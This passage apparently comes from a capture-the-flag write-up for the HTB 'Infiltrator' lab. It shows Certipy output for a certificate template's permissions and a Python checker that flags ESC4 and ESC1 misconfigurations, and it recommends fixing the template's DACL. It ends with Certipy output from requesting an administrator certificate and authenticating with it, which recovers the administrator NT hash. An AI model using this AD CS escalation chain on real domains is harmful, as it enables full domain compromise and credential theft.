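    Authorized Signatures Required      : 1
    Permissions
      Enrollment Permissions
        Enrollment Rights               : INFILTRATOR.HTB\\Domain Admins
                                          INFILTRATOR.HTB\\Enterprise Admins
      Object Control Permissions
        Owner                           : INFILTRATOR.HTB\\Local System
        Write Owner Principals          : INFILTRATOR.HTB\\infiltrator_svc
                                          INFILTRATOR.HTB\\Domain Admins
        Write Dacl Principals           : INFILTRATOR.HTB\\infiltrator_svc
                                          INFILTRATOR.HTB\\Domain Admins
        Write Property Principals       : INFILTRATOR.HTB\\infiltrator_svc
                                          INFILTRATOR.HTB\\Domain Admins
"""


def parse_template(text):
    """Turn 'Key : value' lines (plus indented continuation lines) into {key: [values]}.
    Lines without a colon that are not continuation values are section headers."""
    fields, last_key, value_col = {}, None, 0
    for line in text.splitlines():
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if ":" in line:
            key, _, value = line.partition(":")
            last_key, value_col = key.strip(), line.index(":") + 1
            fields[last_key] = [value.strip()] if value.strip() else []
        elif last_key and indent >= value_col:
            fields[last_key].append(line.strip())   # continuation of a list value
        else:
            last_key = None                         # section header such as "Permissions"
    return fields


def _short(principal):
    return principal.split("\\", 1)[-1]             # drop the DOMAIN\ prefix


def _unprivileged(principals):
    return sorted({_short(p) for p in principals if _short(p) not in PRIVILEGED})


def assess(fields):
    """Return a list of finding strings for the parsed template."""
    findings = []
    writers = set()
    for key in ("Write Owner Principals", "Write Dacl Principals", "Write Property Principals"):
        writers.update(_unprivileged(fields.get(key, [])))
    if writers:
        findings.append(f"ESC4: {', '.join(sorted(writers))} can modify the template")
    enrollers = _unprivileged(fields.get("Enrollment Rights", []))
    if (fields.get("Client Authentication") == ["True"]
            and fields.get("Enrollee Supplies Subject") == ["True"]
            and fields.get("Requires Manager Approval") == ["False"]
            and fields.get("Authorized Signatures Required") == ["0"]
            and enrollers):
        findings.append(f"ESC1: {', '.join(enrollers)} can enroll with an arbitrary subject")
    return findings


def after_template_rewrite(fields):
    """The same template once a Write Property holder has cleared the approval and
    signature requirements and opened enrollment (the state after 'certipy template')."""
    rewritten = dict(fields)
    rewritten["Requires Manager Approval"] = ["False"]
    rewritten["Authorized Signatures Required"] = ["0"]
    rewritten["Enrollment Rights"] = ["INFILTRATOR.HTB\\Authenticated Users"]  # assumed
    return rewritten


if __name__ == "__main__":
    template = parse_template(CERTIPY_TEMPLATE)
    print("as found:      ", assess(template))
    print("after rewrite: ", assess(after_template_rewrite(template)))
```

The first assessment reports only ESC4, since manager approval and the signature requirement still hold; the second shows ESC1 appearing the moment those are removed. The durable fix is on the DACL: no account outside the CA administrators should hold Write Owner, Write Dacl or Write Property on a template that allows client authentication.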
Re-running the check now reports ESC1, which goes straight to administrator:

```
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
```
And then simply authenticate as admin and claim our root flag:
```
$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.31
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1
```